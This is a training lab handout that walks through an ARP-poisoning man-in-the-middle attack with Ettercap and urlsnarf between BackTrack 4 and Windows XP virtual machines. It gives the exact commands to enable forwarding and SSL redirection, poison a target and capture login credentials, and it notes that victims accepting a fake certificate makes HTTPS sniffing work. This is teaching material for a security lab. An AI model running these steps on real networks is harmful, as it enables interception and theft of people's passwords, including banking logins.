Ettercap Lab

Start the BackTrack 4 VM machine

Start the Windows XP VM machine

XP VM Setup

Your XP VM should be set to obtain IP Dynamically same for the DNS settings.

Next open a command prompt in XP and type: ipconfig /flushdns

BackTrack 4 Setup

Open a Terminal and type: dhclient3 eth0 press enter then type echo 1 >
/proc/sys/net/ipv4/ip_forward

then type cat /proc/sys/net/ipv4/ip_forward

You should see a 1 in the terminal this enable packets to be forwarded through the attacking
machine.

At the Terminal type: kate /etc/etter.conf

Remove the # from the file in the highlighted below

#---------------
# Linux
#---------------

# if you use ipchains:

#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j
REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j
REDIRECT %rport"

# if you use iptables:

#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j
REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j
REDIRECT --to-port %rport"

Save and close the file and proceed.

ARP Poisoning

On the XP VM type ipconfig in the commandline and record ip address this will be the target
address.

Then in the BT4 Terminal type: ettercap -Tq -d -i eth0 -M arp: /IP of Target/ //

Explanation
-T text mode
-q quiet mode
-d password parsing
-i network interface
-M Man in the Middle
-arp ARP poisoning
// // all hosts on the LAN (This is very dangerous on a large LAN, could bring down the LAN, but
this would be cool to do and run wireshark to see all the fake ARP requests)

Then open an additional Terminal in BT4 and type: urlsnarf -i eth0 this will allow you to see all
http(s) traffic.

Next goto to your XP VM and open the browser and type: http://tinyurl.com/fakelogin
At this page enter any user name and password and press submit.

Now goto your BT4 terminal and at the bottom you should see your user name and password you
entered. Ettercap is able to sniff your credentials out of the packets.

Now go to Facebook.com or Gmail.com and try it, don't use your real user name and password
Tony, the trick is to get the user to accept the fake SSL certificate, most people do, so you should
too. Did you see the SSL certificate pop up asking for your acceptance? You should then see the
user name and password and ip addresses in the ettercap terminal. Go and try some other sites
and see what you can grab, FTP2net, email, banking, etc…

Record your Ettercap Terminal Output, showing the passwords captured and the
URLSNARF traffic.

press q to stop the ARP Poisoning